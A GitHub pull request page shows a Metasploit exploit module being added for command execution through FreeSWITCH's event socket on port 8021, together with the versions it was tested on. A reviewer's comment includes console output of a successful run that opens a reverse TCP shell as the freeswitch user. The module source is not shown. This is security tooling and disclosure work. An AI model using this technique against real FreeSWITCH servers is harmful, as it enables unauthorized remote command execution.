Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add FreeSWITCH Event Socket Command Execution #12534

Merged
merged 3 commits into from Nov 13, 2019

Conversation

@bcoles
Copy link
Contributor

bcoles commented Nov 2, 2019

Add FreeSWITCH Event Socket Command Execution module.

    This module uses the FreeSWITCH event socket interface
    to execute system commands using the `system` API command.

    The event socket service is enabled by default and listens
    on TCP port 8021 on the local network interface.

    This module has been tested successfully on FreeSWITCH versions:

    1.6.10-17-726448d~44bit on FreeSWITCH-Deb8-TechPreview virtual machine;
    1.8.4~64bit on Ubuntu 19.04 (x64); and
    1.10.1~64bit on Windows 7 SP1 (EN) (x64).
@wchen-r7 wchen-r7 self-assigned this Nov 5, 2019
@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Nov 5, 2019

This works for me:

[*] 127.0.0.1:1234 - The target appears to be vulnerable.
msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > run

[*] Started reverse TCP double handler on 192.168.0.14:5555 
[*] 127.0.0.1:1234 - Login success
[*] 127.0.0.1:1234 - Sending payload (287 bytes) ...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo xJrZw7aAJtXOMsS4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "xJrZw7aAJtXOMsS4\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (192.168.0.14:5555 -> 192.168.0.85:46359) at 2019-11-05 14:13:44 -0600

id
uid=999(freeswitch) gid=999(freeswitch) groups=999(freeswitch)
@wchen-r7 wchen-r7 merged commit 71cbefa into rapid7:master Nov 13, 2019
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Nov 13, 2019

Release Notes

This module uses the FreeSWITCH event socket interface to execute system commands using the system API command.

msjenkins-r7 added a commit that referenced this pull request Nov 13, 2019
Add FreeSWITCH Event Socket Command Execution
@bcoles bcoles deleted the bcoles:freeswitch_event_socket_cmd_exec branch Nov 13, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
2 participants
You can’t perform that action at this time.